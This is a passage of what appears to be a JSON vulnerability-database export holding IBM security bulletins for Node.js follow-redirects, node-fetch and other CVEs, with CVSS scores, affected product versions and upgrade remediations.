"5C271AD23C78209D68E7A87FEE871717C7B2FBA4E3C92BC59004D9DAAA41DBDE", "href": "https://www.ibm.com/support/pages/node/6529200", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:48:31", "description": "## Summary\n\nA security vulnerability in Node.js follow-redirects module affects IBM Cloud Automation Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Automation Manager| 4.2.0.1 \n \n\n\n## Remediation/Fixes\n\nDownload IBM Cloud Automation Manager 4.2.0.1 iFix 6 from [https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build601049&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build601049&includeSupersedes=0>)\n\nFollow the instructions in Readme link in [https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build601049&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build601049&includeSupersedes=0>) to install the iFix 6 to your IBM Cloud Automation Manager 4.2.0.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-15T17:45:16", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js follow-redirects module affects IBM Cloud Automation Manager", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-03-15T17:45:16", "id": "063491361B2190A4BDB47CE0565DAC2669F1F803EA0AE2C2F5C154AF5B3184B0", "href": "https://www.ibm.com/support/pages/node/6563571", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-28T01:43:32", "description": "## Summary\n\nThis security vulnerability affects the follow-redirects component that is used by IBM Event Streams.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Event Streams| 10.0.0, 10.1.0, 10.2.0-eus, 10.2.1-eus, 10.3.0, 10.3.1, 10.4.0, 10.5.0, 11.0.0, 11.0.1 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading \n\nUpgrade to IBM Event Streams 11.0.2 by following the [upgrading and migrating](<https://ibm.github.io/event-streams/installing/upgrading/> \"upgrading and migrating\" ) documentation.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-03T11:16:31", "type": "ibm", "title": "Security Bulletin: Vulnerability in the Node.js follow-redirects component affects IBM Event Streams (CVE-2022-0536)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-08-03T11:16:31", "id": "F62DE39E6BBF78B361B2012BC02FAADBB8E936EF06E4AEF3BE7D67F25A370F61", "href": "https://www.ibm.com/support/pages/node/6609986", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-28T01:40:31", "description": "## Summary\n\nA security vulnerability in Nodejs follow-redirects affects IBM Cloud Pak for Multicloud Management Managed Services\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management Infrastructure Management| All \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.3 Fix Pack 5 by following the instructions at <https://www.ibm.com/docs/en/cloud-paks/cp-management/2.3.x?topic=upgrade-upgrading-fix-pack-5>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-21T10:00:06", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Nodejs follow-redirects affects IBM Cloud Pak for Multicloud Management Managed Services", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-09-21T10:00:06", "id": "CEE914F2A9C303F09F1BBE51743533607509D4AD5902E5567A43B8EBE45C4DB5", "href": "https://www.ibm.com/support/pages/node/6621979", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-28T01:47:23", "description": "## Summary\n\nNode.js module follow-redirects is used by IBM App Connect Enterprise Certified Container operands when making network calls in a Node.js process. IBM App Connect Enterprise Certified Container operands may be vulnerable to loss of confidentiality. This bulletin provides patch information to address the reported vulnerability CVE-2022-0536 in all components.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nApp Connect Enterprise Certified Container| 1.1-eus with Operator \nApp Connect Enterprise Certified Container| 2.1 with Operator \nApp Connect Enterprise Certified Container| 3.0 with Operator \nApp Connect Enterprise Certified Container| 3.1 with Operator \n \n\n\n## Remediation/Fixes\n\nApp Connect Enterprise Certified Container 2.1, 3.0 and 3.1 (Continuous Delivery) \n\nUpgrade to App Connect Enterprise Certified Container Operator version 4.0.0 or higher, and ensure that all components are at 12.0.3.0-r2 or higher. Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect/containers_cd?topic=releases-upgrading-operator>\n\nApp Connect Enterprise Certified Container 1.1 EUS (Extended Update Support)\n\nUpgrade to App Connect Enterprise Certified Container Operator version 1.1.8 or higher, and ensure that all components are at 11.0.0.17-r1-eus or higher. Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect/containers_eus?topic=releases-upgrading-operator>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-22T15:52:43", "type": "ibm", "title": "Security Bulletin: IBM App Connect Enterprise Certified Container operands may be vulnerable to loss of confidentiality due to CVE-2022-0536", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-04-22T15:52:43", "id": "26DAA09B7B725284403A5958F9F931A154E7F981FE5B15C52EF287FBC719570C", "href": "https://www.ibm.com/support/pages/node/6574433", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-28T01:46:49", "description": "## Summary\n\nSecurity Bulletin: IBM Robotic Process Automation may be vulnerable to an exposure of sensitive information by an unauthorized actor through follow-redirects (CVE-2022-0536)\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n**DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Robotic Process Automation | &lt; 21.0.2.3 \n \n## Remediation/Fixes\n\nAffected Product(s) | Version(s) | Fix/Remediation \n---|---|--- \nIBM Robotic Process Automation | &lt; 21.0.2.3 | Update to 21.0.2.3 (21.0.2 IF003) or higher \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-04T19:28:11", "type": "ibm", "title": "Security Bulletin: IBM Robotic Process Automation may be vulnerable to an exposure of sensitive information by an unauthorized actor through follow-redirects (CVE-2022-0536)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-05-04T19:28:11", "id": "C28EAFF1CC71A4F487A89A39207111406CEEB9D4565E34E02EC25999839C6D3E", "href": "https://www.ibm.com/support/pages/node/6574809", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-28T21:38:55", "description": "## Summary\n\nNode.js module node-fetch is used by IBM App Connect Enterprise Certified Container for some HTTP calls. IBM App Connect Enterprise Certified Container operands may be vulnerable to denial of service. This bulletin provides patch information to address the reported vulnerability CVE-2022-2596 in Node.js module node-fetch.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-2596](<https://vulners.com/cve/CVE-2022-2596>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw in the isOriginPotentiallyTrustworthy() function in the referrer.js script. By sending specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/232616](<https://exchange.xforce.ibmcloud.com/vulnerabilities/232616>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nApp Connect Enterprise Certified Container| 4.1 \nApp Connect Enterprise Certified Container| 4.2 \nApp Connect Enterprise Certified Container| 5.0-lts \nApp Connect Enterprise Certified Container| 5.1 \n \n\n\n## Remediation/Fixes\n\n**App Connect Enterprise Certified Container 4.1, 4.2, 5.0 and 5.1 (Continuous Delivery)**\n\nUpgrade to App Connect Enterprise Certified Container Operator version 5.2.0 or higher, and ensure that all components are at 12.0.5.0-r3 or higher. Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect/containers_cd?topic=releases-upgrading-operator>\n\n**App Connect Enterprise Certified Container 5.0 LTS (Long Term Support)**\n\nUpgrade to App Connect Enterprise Certified Container Operator version 5.0.1 or higher, and ensure that all components are at 12.0.6.0-r1-lts or higher. Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect-contlts?topic=releases-upgrading-operator>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-11-04T17:35:10", "type": "ibm", "title": "Security Bulletin: IBM App Connect Enterprise Certified Container operands may be vulnerable to denial of service due to CVE-2022-2596", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2022-11-04T17:35:10", "id": "7DC20E33AEE12D8C047DEA72271A62A680A525F01237467155E55137DACD1D44", "href": "https://www.ibm.com/support/pages/node/6837287", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-28T01:55:45", "description": "## Summary\n\nIBM Security Guardium Insights has addressed the following vulnerabilities\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-13949](<https://vulners.com/cve/CVE-2020-13949>) \n** DESCRIPTION: **Apache Thrift is vulnerable to a denial of service, caused by improper input validation. By sending specially-crafted messages, a remote attacker could exploit this vulnerability to cause a large memory allocation. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196738](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196738>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-8265](<https://vulners.com/cve/CVE-2020-8265>) \n** DESCRIPTION: **Node.js is vulnerable to a denial of service, caused by a use-after-free in TLSWrap within the TLS implementation. By writing to a TLS enabled socket, an attacker could exploit this vulnerability to corrupt memory and cause a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/194101](<https://exchange.xforce.ibmcloud.com/vulnerabilities/194101>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-8287](<https://vulners.com/cve/CVE-2020-8287>) \n** DESCRIPTION: **Node.js is vulnerable to HTTP request smuggling. By sending specially crafted HTTP request headers, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks. \nCVSS Base score: 7.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/194100](<https://exchange.xforce.ibmcloud.com/vulnerabilities/194100>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2021-3177](<https://vulners.com/cve/CVE-2021-3177>) \n** DESCRIPTION: **Python is vulnerable to a buffer overflow, caused by improper bounds checking by the PyCArg_repr function in _ctypes/callproc.c. By sending specially-crafted arguments to c_double.from_param, a remote attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/195244](<https://exchange.xforce.ibmcloud.com/vulnerabilities/195244>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-3121](<https://vulners.com/cve/CVE-2021-3121>) \n** DESCRIPTION: **An unspecified error with the lack of certain index validation, aka the skippy peanut butter issue in GoGo Protobuf has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/194539](<https://exchange.xforce.ibmcloud.com/vulnerabilities/194539>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Guardium Insights| 2.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium Insights| 3.0| [https://www.ibm.com/software/passportadvantage/?mhsrc=ibmsearch_a&amp;mhq=pasport%20advantage](<https://www.ibm.com/software/passportadvantage/?mhsrc=ibmsearch_a&mhq=pasport%20advantage>) \nPlease download V 3.0 \n \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T16:09:54", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium Insights is affected by multiple vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13949", "CVE-2020-28500", "CVE-2020-8265", "CVE-2020-8287", "CVE-2021-23337", "CVE-2021-3121", "CVE-2021-3177"], "modified": "2021-07-06T16:09:54", "id": "0FF78AF1C487DE3B1A92548681C12BB71F6CB2B0B453E94F828CDEF3248FE0FD", "href": "https://www.ibm.com/support/pages/node/6469135", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:48:27", "description": "## Summary\n\nIBM App Connect Enterprise ships with Node.js for which vulnerabilities were reported and have been addressed. Vulnerability details are listed below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0235](<https://vulners.com/cve/CVE-2022-0235>) \n** DESCRIPTION: **Node.js node-fetch could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw when fetching a remote url with Cookie. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217758](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217758>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM App Connect Enterprise V12.0.1.0 - V12.0.3.0\n\nIBM App Connect Enterprise V11.0.0.0 - V11.0.0.15\n\n \n\n\n## Remediation/Fixes\n\nIBM recommends addressing the vulnerability now by applying the patches listed in this table. \n\n**Product**\n\n| \n\n**VRMF**\n\n| APAR| \n\n**Remediation / Fix** \n \n---|---|---|--- \nIBM App Connect Enterprise V12| V12.0.1.0 - V12.0.3.0| IT39917| \n\nAPAR IT39917 Interim fix for APAR (IT39917) is available from\n\n[IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+App+Connect+Enterprise&release=12.0.3.0&platform=All&function=aparId&apars=IT39917> \"IBM Fix Central\" ) \n \nIBM App Connect Enterprise v11| V11.0.0.0 - V11.0.0.15| IT39917| \n\nThe APAR IT39917 is available in fix pack 11.0.0.16\n\n[IBM App Connect Enterprise -11.0.0.16](<https://www.ibm.com/support/pages/ibm-app-connect-enterprise-v110-fix-pack-110016> \"IBM App Connect Enterprise -11.0.0.16\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes Section.**\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-03-16T12:15:54", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Node.js affect IBM App Connect Enterprise (CVE-2022-0235)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-03-16T12:15:54", "id": "8AE73E7788D425E7758D6639D44230CC4CB98CD649CB92F28391CB1E55BB4271", "href": "https://www.ibm.com/support/pages/node/6563901", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-02-28T01:40:34", "description": "## Summary\n\nSecurity Bulletin: A security vulnerability in Nodejs node-fetch affects IBM Cloud Pak for Multicloud Management Managed Services\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0235](<https://vulners.com/cve/CVE-2022-0235>) \n** DESCRIPTION: **Node.js node-fetch could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw when fetching a remote url with Cookie. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217758](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217758>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management Infrastructure Management| All \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.3 Fix Pack 5 by following the instructions at <https://www.ibm.com/docs/en/cloud-paks/cp-management/2.3.x?topic=upgrade-upgrading-fix-pack-5>\n\n## Workarounds and 